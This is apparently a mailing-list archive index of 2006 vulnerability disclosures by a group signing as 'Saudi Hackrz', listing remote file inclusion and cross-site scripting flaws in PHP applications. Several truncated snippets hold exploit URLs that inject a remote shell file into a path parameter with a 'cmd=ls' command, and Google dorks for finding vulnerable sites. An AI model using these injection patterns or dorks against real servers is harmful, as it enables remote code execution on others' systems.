RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability

2006-12-18 Thread saudi
nc.php ) Remote File Include Vulnerability # Author: Al7ejaz Hacker # Website: http://www.planetluc.com/en/ not free version # Discovered: 15/12/2006 # Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at

mmgallery Multiple vulnerabilities

2006-11-24 Thread saudi
+ + ;;ii,,:: + + :: ;;t

Cross site scripting & fullpath disclosure

2006-11-24 Thread saudi
+ + ;;ii,,:: + +

Pie Cart Pro => (Home_Path) Remote File Inclusion Exploit

2006-09-19 Thread saudi . unix
# #Pie Cart Pro => (Home_Path) Remote File Inclusion Exploit # # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.doodlebabies.

PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

2006-09-15 Thread Saudi . unix
# #PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit # # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.popphoto.

PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit

2006-09-14 Thread saudi . unix
# #PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit # # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.popphoto.

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

2006-09-14 Thread saudi . unix
# #Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit # # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.reamdaysoft.

PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit

2006-09-08 Thread saudi . unix
# #PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit # # #Critical Level : Dangerous # #By Saudi Hac

in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit

2006-09-05 Thread saudi . unix
vel : Dangerous # #By Saudi Hackrz # #http://www.in-portal.net/ #http://www.in-portal.net/products

powergap <= (s0x.php) Remote File Inclusion

2006-08-17 Thread saudi . unix
com/sid=http://SHELLURL.COM #=== #Discoverd By : Saudi Hackrz # #Conatact : Saudi.unix[at]hotmail.com # #GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18 #www.3asfh.net =

com_moskool (admin.moskool.php) Remote File Include Vulnerabilities

2006-07-31 Thread saudi . unix
By saudi hackrz Rish : High --- test on tis site : www.filters.ru --- google : allinurl:"com_moskool" or "moskool" Exploit : http://[target]/component/option,com_moskool/Itemid,

SQuery v.x (devi.php) (armygame.php) Remote File Inclusion

2006-07-24 Thread saudi . unix
iscoverd By : SHiKaA Conatact : SHiKaA-[at]hotmail.com _________- and Discoverd By : saudi hackrz The breath of the error in another files - SQuery/lib/devi.php?libpath=http://SHELLURL.COM? -- SQuery/lib/armygame.php?libpath=http://SHELLURL.COM? --- SQu

PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

2006-07-24 Thread saudi . unix
-PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities By saudi hackrz --- Exploit : http://[target]/[path]/setup/header.php?css_path=http://sit/shell.txt?cmd=ls

ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities

2006-07-18 Thread saudi . unix
d.txt?&cmd=ls - greatz: ~ SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB, --- Contact: ~~~ Nick: saudi hackrz E-mail: saudi.unix[at]hotmail[dot]Com site: http://www.3asfh.net

randshop <= 1.1.x (index.php) Remote File Inclusion Vulnerability

2006-07-10 Thread Saudi . Unix
Title : randshop <= 1.1.x Remote File Inclusion Vulnerability - URL : http://www.randshop.com/ - Author :Saudi Hackrz - contact : Saudi.Unix[at]Hotmail.com - dork: "software 2004-2005 by randshop" - exploit : http://[target]/[pa